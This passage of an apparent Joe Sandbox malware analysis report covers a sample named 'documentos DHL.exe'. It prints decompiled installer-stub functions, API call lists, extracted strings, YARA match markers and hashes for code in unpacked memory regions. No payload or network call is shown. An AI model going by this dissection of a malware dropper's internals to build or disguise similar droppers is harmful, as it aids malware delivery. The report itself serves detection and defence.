API String ID: 3761449716-0
Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00405553 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00405553(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x429224;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E004054E7, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E004063D2(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x423728;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x42920c == _t156) {
							ShowWindow( *0x42a248, 8);
							if( *0x42a2ec == _t156) {
								E00405414( *((intOrPtr*)( *0x422700 + 0x34)), _t156);
							}
							E0040431E(_t171);
							goto L25;
						}
						 *0x421ef8 = 2;
						E0040431E(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E004043AC(_a8, _a12, _a16);
						}
						ShowWindow( *0x429210, _t156);
						ShowWindow(_t169, 8);
						E0040437A(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x42a254;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x429210 = GetDlgItem(_a4, 0x403);
				 *0x429208 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x429224 = _t134;
				_v8 = _t134;
				E0040437A( *0x429210);
				 *0x429214 = E00404CB1(4);
				 *0x42922c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60);
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00404345(_a4);
				if(( *0x42a25c & 0x00000003) != 0) {
					ShowWindow( *0x429210, _t156);
					if(( *0x42a25c & 0x00000002) != 0) {
						 *0x429210 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E0040437A( *0x429208);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x42a25c & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

0x0040555b
0x00405561
0x0040556b
0x0040556e
0x00405704
0x00405728
0x00405728
0x0040573b
0x00405759
0x0040575b
0x00405763
0x004057b9
0x004057bd
0x00000000
0x00000000
0x004057bf
0x004057c5
0x00000000
0x00000000
0x004057cf
0x004057d7
0x004057da
0x004058dc
0x00000000
0x004058dc
0x004057e9
0x004057f4
0x004057fd
0x00405808
0x0040580b
0x00405814
0x0040581a
0x0040581d
0x0040581d
0x00405835
0x0040583e
0x00405841
0x00405848
0x0040584f
0x00405857
0x00405857
0x0040586e
0x0040586e
0x00405875
0x0040587b
0x00405887
0x0040588e
0x00405897
0x00405899
0x0040589c
0x004058ab
0x004058ae
0x004058b4
0x004058b5
0x004058bb
0x004058bc
0x004058bd
0x004058c5
0x004058d0
0x004058d6
0x004058d6
0x00000000
0x00405835
0x0040576b
0x0040579b
0x004057a3
0x004057ae
0x004057ae
0x004057b4
0x00000000
0x004057b4
0x0040576f
0x00405779
0x00000000
0x0040573d
0x00405743
0x0040577e
0x00000000
0x00405787
0x0040574c
0x00405751
0x00405754
0x00000000
0x00405754
0x0040573b
0x00405574
0x00405578
0x00405580
0x00405584
0x00405587
0x0040558a
0x0040558d
0x00405590
0x00405591
0x00405592
0x004055ab
0x004055ae
0x004055b8
0x004055c7
0x004055cf
0x004055d7
0x004055dc
0x004055df
0x004055eb
0x004055f4
0x004055fd
0x0040561f
0x00405625
0x00405636
0x0040563b
0x00405649
0x00405657
0x00405657
0x0040565c
0x0040566a
0x0040566a
0x0040566f
0x00405672
0x00405677
0x00405683
0x0040568c
0x00405699
0x004056a8
0x0040569b
0x004056a0
0x004056a0
0x004056b4
0x004056b4
0x004056c8
0x004056d1
0x004056da
0x004056ea
0x004056f6
0x004056f6
0x00000000

APIs

GetDlgItem.USER32(?,00000403), ref: 004055B1
GetDlgItem.USER32(?,000003EE), ref: 004055C0
GetClientRect.USER32(?,?), ref: 004055FD
GetSystemMetrics.USER32(00000002), ref: 00405604
SendMessageW.USER32(?,00001061,00000000,?), ref: 00405625
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405636
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405649
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405657
SendMessageW.USER32(?,00001024,00000000,?), ref: 0040566A
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040568C
ShowWindow.USER32(?,00000008), ref: 004056A0
GetDlgItem.USER32(?,000003EC), ref: 004056C1
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004056D1
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004056EA
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004056F6
GetDlgItem.USER32(?,000003F8), ref: 004055CF

Part of subcall function 0040437A: SendMessageW.USER32(00000028,?,00000001,004041A5), ref: 00404388

GetDlgItem.USER32(?,000003EC), ref: 00405713
CreateThread.KERNEL32(00000000,00000000,Function_000054E7,00000000), ref: 00405721
CloseHandle.KERNEL32(00000000), ref: 00405728
ShowWindow.USER32(00000000), ref: 0040574C
ShowWindow.USER32(?,00000008), ref: 00405751
ShowWindow.USER32(00000008), ref: 0040579B
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057CF
CreatePopupMenu.USER32 ref: 004057E0
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004057F4
GetWindowRect.USER32(?,?), ref: 00405814
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040582D
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405865
OpenClipboard.USER32(00000000), ref: 00405875
EmptyClipboard.USER32 ref: 0040587B
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405887
GlobalLock.KERNEL32(00000000), ref: 00405891
SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A5
GlobalUnlock.KERNEL32(00000000), ref: 004058C5
SetClipboardData.USER32(0000000D,00000000), ref: 004058D0
CloseClipboard.USER32 ref: 004058D6

Strings

{, xrefs: 004057B9
(7B, xrefs: 00405841

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: (7B${
API String ID: 590372296-525222780
Opcode ID: f086514403ad079958e05c79f9398a2ee239ec86c73215fd307c521ee98444fa
Instruction ID: f8c5fe522ebc9739dae7df13929d3a15495bf3740f19f89270c8c50aa4207807
Opcode Fuzzy Hash: f086514403ad079958e05c79f9398a2ee239ec86c73215fd307c521ee98444fa
Instruction Fuzzy Hash: AFB15870900608FFDB11AFA0DD85AAE7B79FB44354F00847AFA45B61A0CB754E51DF68

Uniqueness

Uniqueness Score: -1.00%

Function 00404814 Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 275
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00404814(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x422700;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + L"540027183";
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E004059F6(0x3fb, _t146);
					E00406644(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E004059F6(0x3fb, _t146);
							if(E00405D89(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E004063B0(0x4216f8, _t146);
							_t87 = E0040678A(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E004063B0(0x4216f8, _t146);
								_t89 = E00405D2C(0x4216f8);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x4216f8,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x4216f8) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x4216f8,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405CCD(0x4216f8);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x4216f8) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404CB1(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x42921c + 0x10)) != _t158) {
									E00404C99(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x4216e8);
									} else {
										E00404BD0(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42a304 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E00404367(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x423718 == _t158) {
									E0040476D();
								}
								 *0x423718 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x423728;
							_v60 = E00404B6A;
							_v56 = _t146;
							_v68 = E004063D2(_t146, 0x423728, _t167, 0x421f00, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405C81(_t146);
								_t125 =  *((intOrPtr*)( *0x42a254 + 0x11c));
								if( *((intOrPtr*)( *0x42a254 + 0x11c)) != 0 && _t146 == L"C:\\Users\\Arthur\\Zorillinae\\Skaalpundet\\Inkbslistes") {
									E004063D2(_t146, 0x423728, _t167, 0, _t125);
									if(lstrcmpiW(0x4281e0, 0x423728) != 0) {
										lstrcatW(_t146, 0x4281e0);
									}
								}
								 *0x423718 =  *0x423718 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405CF8(_t146) != 0 && E00405D2C(_t146) == 0) {
						E00405C81(_t146);
					}
					 *0x429218 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00404345(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00404345(_t167);
					E0040437A(_t166);
					_t138 = E0040678A(7);
					if(_t138 == 0) {
						L53:
						return E004043AC(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}

0x00404814
0x0040481a
0x00404820
0x0040482d
0x0040483b
0x0040483e
0x00404846
0x0040484c
0x0040484c
0x00404858
0x0040485b
0x004048c9
0x004048d0
0x004049a7
0x004049ae
0x004049bd
0x004049bd
0x004049c1
0x004049cb
0x004049d8
0x004049da
0x004049da
0x004049e8
0x004049ef
0x004049f6
0x004049f9
0x00404a35
0x00404a37
0x00404a3d
0x00404a42
0x00404a46
0x00404a48
0x00404a48
0x00404a64
0x00000000
0x00404a66
0x00404a69
0x00404a77
0x00404a7d
0x00404a7e
0x00404a81
0x00404a84
0x00000000
0x00404a84
0x004049fb
0x004049fd
0x00404a01
0x00000000
0x00000000
0x00000000
0x00000000
0x00404a03
0x00404a03
0x00404a10
0x00404a15
0x00000000
0x00000000
0x00404a19
0x00404a1b
0x00404a1b
0x00404a24
0x00404a26
0x00404a2b
0x00404a2e
0x00404a33
0x00000000
0x00000000
0x00000000
0x00000000
0x00404a33
0x00404a90
0x00404a9a
0x00404a9d
0x00404aa0
0x00404aa7
0x00404aa7
0x00404aa9
0x00404aa9
0x00404aae
0x00404ab0
0x00404ab8
0x00404abf
0x00404ac1
0x00404acc
0x00404acc
0x00404ac1
0x00404adc
0x00404ae6
0x00404aee
0x00404b09
0x00404af0
0x00404af9
0x00404af9
0x00404aee
0x00404b0e
0x00404b13
0x00404b18
0x00404b21
0x00404b21
0x00404b2a
0x00404b2c
0x00404b2c
0x00404b38
0x00404b40
0x00404b4a
0x00404b4a
0x00404b4f
0x00000000
0x00404b4f
0x004049f9
0x004049b0
0x004049b7
0x00000000
0x00000000
0x00000000
0x004049b7
0x004048d6
0x004048df
0x004048f9
0x004048fe
0x00404908
0x0040490f
0x0040491b
0x0040491e
0x00404921
0x00404928
0x00404930
0x00404933
0x00404937
0x0040493e
0x00404946
0x004049a0
0x00404948
0x00404949
0x00404950
0x0040495a
0x00404962
0x0040496f
0x00404983
0x00404987
0x00404987
0x00404983
0x0040498c
0x00404999
0x00404999
0x00404946
0x00000000
0x004048fe
0x004048ec
0x00000000
0x00000000
0x004048f2
0x00000000
0x0040485d
0x0040486a
0x00404873
0x00404880
0x00404880
0x00404887
0x0040488d
0x00404896
0x00404899
0x0040489c
0x004048a4
0x004048a7
0x004048aa
0x004048b0
0x004048b7
0x004048be
0x00404b55
0x00404b67
0x004048c4
0x004048c7
0x00000000
0x004048c7
0x004048be

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404863
SetWindowTextW.USER32(00000000,?), ref: 0040488D
SHBrowseForFolderW.SHELL32(?), ref: 0040493E
CoTaskMemFree.OLE32(00000000), ref: 00404949
lstrcmpiW.KERNEL32(Call,00423728,00000000,?,?), ref: 0040497B
lstrcatW.KERNEL32(?,Call), ref: 00404987
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404999

Part of subcall function 004059F6: GetDlgItemTextW.USER32(?,?,00000400,004049D0), ref: 00405A09

Part of subcall function 00406644: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\documentos DHL.exe",00403464,C:\Users\user\AppData\Local\Temp\,76523420,004036D5,?,00000006,00000008,0000000A), ref: 004066A7
Part of subcall function 00406644: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066B6
Part of subcall function 00406644: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\documentos DHL.exe",00403464,C:\Users\user\AppData\Local\Temp\,76523420,004036D5,?,00000006,00000008,0000000A), ref: 004066BB
Part of subcall function 00406644: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\documentos DHL.exe",00403464,C:\Users\user\AppData\Local\Temp\,76523420,004036D5,?,00000006,00000008,0000000A), ref: 004066CE

GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 00404A5C
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404A77

Part of subcall function 00404BD0: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C71
Part of subcall function 00404BD0: wsprintfW.USER32 ref: 00404C7A
Part of subcall function 00404BD0: SetDlgItemTextW.USER32(?,00423728), ref: 00404C8D

Strings

(7B, xrefs: 00404911
Call, xrefs: 00404975, 0040497A, 00404985
540027183, xrefs: 0040482D
C:\Users\user\Zorillinae\Skaalpundet\Inkbslistes, xrefs: 00404964
A, xrefs: 00404937

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: (7B$540027183$A$C:\Users\user\Zorillinae\Skaalpundet\Inkbslistes$Call
API String ID: 2624150263-2942618226
Opcode ID: f04caca690f49e87266c44fb9cab88c370668c693f36f0659ef379fd8dc31e70
Instruction ID: 8d8d1438250e4d518a9e2371570913b63a9457987511b3c3302aefac7d34506d
Opcode Fuzzy Hash: f04caca690f49e87266c44fb9cab88c370668c693f36f0659ef379fd8dc31e70
Instruction Fuzzy Hash: B3A184F1A00209ABDB119FA5CD45AAF77B8EF84314F14843BFA01B62D1D77C99418B6D

Uniqueness

Uniqueness Score: -1.00%

Function 03383D65 Relevance: 15.8, Strings: 10, Instructions: 3327COMMON

Download Yara Rule

Strings

l`h, xrefs: 0338492F
3/0, xrefs: 03388735
4}*, xrefs: 033846EC
7y| , xrefs: 03388AF8
U#Z, xrefs: 03387438
I#^F, xrefs: 0338717A
}B, xrefs: 033857C9
@;, xrefs: 03386ADB
>MEn, xrefs: 03384542
|2<, xrefs: 03386594

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: 3/0$4}*$7y| $>MEn$I#^F$l`h$|2<$}B$U#Z$@;
API String ID: 0-1041054743
Opcode ID: 53afd37ead90dde06a1ee88b313a298560f4dc7a80101976d124ab1de12f72d0
Instruction ID: a63cb7e2e17c9b1f9dd77df31186663fd7497e693f9666f4ab816c1339040f50
Opcode Fuzzy Hash: 53afd37ead90dde06a1ee88b313a298560f4dc7a80101976d124ab1de12f72d0
Instruction Fuzzy Hash: 6363C975540365CFDF7A8F78CAD63D63BB2EF62350F8941A6CC869A628D3344646CB02

Uniqueness

Uniqueness Score: -1.00%

Function 03384CF8 Relevance: 11.6, Strings: 7, Instructions: 2814COMMON

Download Yara Rule

Strings

3/0, xrefs: 03388735
7y| , xrefs: 03388AF8
U#Z, xrefs: 03387438
I#^F, xrefs: 0338717A
}B, xrefs: 033857C9
@;, xrefs: 03386ADB
|2<, xrefs: 03386594

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: 3/0$7y| $I#^F$|2<$}B$U#Z$@;
API String ID: 0-3826147167
Opcode ID: eaf242a9aea31818146c3e42071b6aa48dac71f9cd263d360b330634f09c212a
Instruction ID: 22e9c2f20b49b5ee7e18931b19f0acbd4de70f267521e19c6abdee2469230982
Opcode Fuzzy Hash: eaf242a9aea31818146c3e42071b6aa48dac71f9cd263d360b330634f09c212a
Instruction Fuzzy Hash: 6D43DA75540369CFDF7A8F78CAD63C63BB2EF52350F9841AACC469A668D3344646CB02

Uniqueness

Uniqueness Score: -1.00%

Function 03371F0F Relevance: 6.8, Strings: 5, Instructions: 557COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
dB, xrefs: 03372306
{, xrefs: 033736BD
t, xrefs: 03372CCE

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@$dB$t${
API String ID: 0-4087330480
Opcode ID: 1d4f0ec97f7e2de8e5e695d1c26b02c4ed6ab2fc74987d0955a6fdc644edeae2
Instruction ID: 1319adf5c1b7a9c1127b42efcd34ac255e9f0a958823423e25b195858dc6641b
Opcode Fuzzy Hash: 1d4f0ec97f7e2de8e5e695d1c26b02c4ed6ab2fc74987d0955a6fdc644edeae2
Instruction Fuzzy Hash: E9B19B46E2A31998E3A3B030C1D17E36788DF171D2F258F6A8827F1DA17B1F4A8A15D4

Uniqueness

Uniqueness Score: -1.00%

Function 03371F6F Relevance: 6.7, Strings: 5, Instructions: 493COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
dB, xrefs: 03372306
{, xrefs: 033736BD
t, xrefs: 03372CCE

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@$dB$t${
API String ID: 0-4087330480
Opcode ID: 7383a466ea91ae1ae9b3da2c9aef45b4dacc8c76630eb8179d7bad0dd146997d
Instruction ID: a151f503de924c96b7a92aa0f923a042c8679721210d3624cdedd912685b1859
Opcode Fuzzy Hash: 7383a466ea91ae1ae9b3da2c9aef45b4dacc8c76630eb8179d7bad0dd146997d
Instruction Fuzzy Hash: 15B19C46E2A31998E3B3B030C1D27E36798DF171D2F258F5A8827F1DA17B1F4A8A15D4

Uniqueness

Uniqueness Score: -1.00%

Function 03372169 Relevance: 6.7, Strings: 5, Instructions: 463COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
dB, xrefs: 03372306
{, xrefs: 033736BD
t, xrefs: 03372CCE

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@$dB$t${
API String ID: 0-4087330480
Opcode ID: b850b0d041968474a6a4ba9eb659b0761d3853b267d9cd036f364a82cd205b72
Instruction ID: 2959cf6c7b7907b7fb367fdb52e97a7be11791144f8ce55184f62d1072c6d1fd
Opcode Fuzzy Hash: b850b0d041968474a6a4ba9eb659b0761d3853b267d9cd036f364a82cd205b72
Instruction Fuzzy Hash: 8CA19E46E2B31998E3B3A030C5D17E36798DF171D2F258F1A8867F2DA17B1F4A8A15C4

Uniqueness

Uniqueness Score: -1.00%

Function 03372019 Relevance: 6.7, Strings: 5, Instructions: 449COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
dB, xrefs: 03372306
{, xrefs: 033736BD
t, xrefs: 03372CCE

Memory Dump Source

